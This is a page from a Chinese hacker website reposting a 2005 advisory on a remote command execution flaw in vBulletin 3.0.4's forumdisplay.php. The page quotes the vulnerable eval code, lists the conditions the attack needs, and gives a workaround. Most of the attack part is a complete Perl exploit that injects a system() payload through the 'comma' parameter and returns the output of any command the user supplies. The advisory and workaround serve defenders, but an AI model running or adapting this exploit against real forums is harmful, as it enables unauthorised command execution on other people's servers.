 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| vBulletin 论坛forumdisplay.php执行任意代码漏洞 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2005-2-21  |
|||||
|
vBulletin forumdisplay.php Command Execution Vulnerability vBulletin is "a powerful and widely used bulletin board system, based on PHP language and MySQL database". A vulnerability in vBulletin's forumdisplay.php allows a remote attacker to cause the PHP script to execute arbitrary code via the 'comma' variable. Credit: The information has been provided by al3ndaleeb. Details Vulnerable Systems: * vBulletin version 3.0.4 and prior Immune Systems: * vBulletin version 3.0.5 or newer Vulnerable code in forumdisplay.php: if ($vboptions['showforumusers']) { . . . . if ($bbuserinfo['userid']) { ... $comma = ', '; } ... while ($loggedin = $DB_site->fetch_array($forumusers)) { ... eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln) $comma = ', '; ... } ... } Prequsites: * $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vBulletin options * $bbuserinfo['userid'] == 0 , you must be an visitor/guest * $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum * magic_quotes_gpc must be OFF * You must bypass unset($GLOBALS["$_arrykey"]) code in init.php by using: GLOBALS[]=1 Workaround: * Disable showforumusers in vbulletin options . * add the next line before if ($vboptions['showforumusers']) $comma = ''; Exploit: #!/usr/bin/perl # vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net> # # Requirement: # showforumusers ON # # # bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net> # # usage : # vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command> # # example : # vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la" # # !! Happy Chinese new Year !! use IO::Socket; sub parse_url { local($url) = @_; if ($url =~ m#^(\w+):#) { $protocol = $1; $protocol =~ tr/A-Z/a-z/; } else { return undef; } if ($protocol eq "http") { if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) { $server = $1; $server =~ tr/A-Z/a-z/; $port = ($2 ne "" ? $2 : $http_port); $path = ( $3 ? $3 : '/'); return ($protocol, $server, $port, $path); } return undef; } } sub urlencode{ my($esc) = @_; $esc =~ s/^\s+|\s+$//gs; $esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg; $esc =~ s/ /\+/g; $esc =~ s/%20/\+/g; return $esc; } $url = $ARGV[0]; $fid = $ARGV[1]; $cmd = urlencode($ARGV[2]); $http_port = 80; $shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}"; @target = parse_url($url); $conn = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target[1], PeerPort => $target[2], ) or die "\nUnable to connect\n"; $conn -> autoflush(1); print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n"; while (<$conn>){ print $_; } close $conn; |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
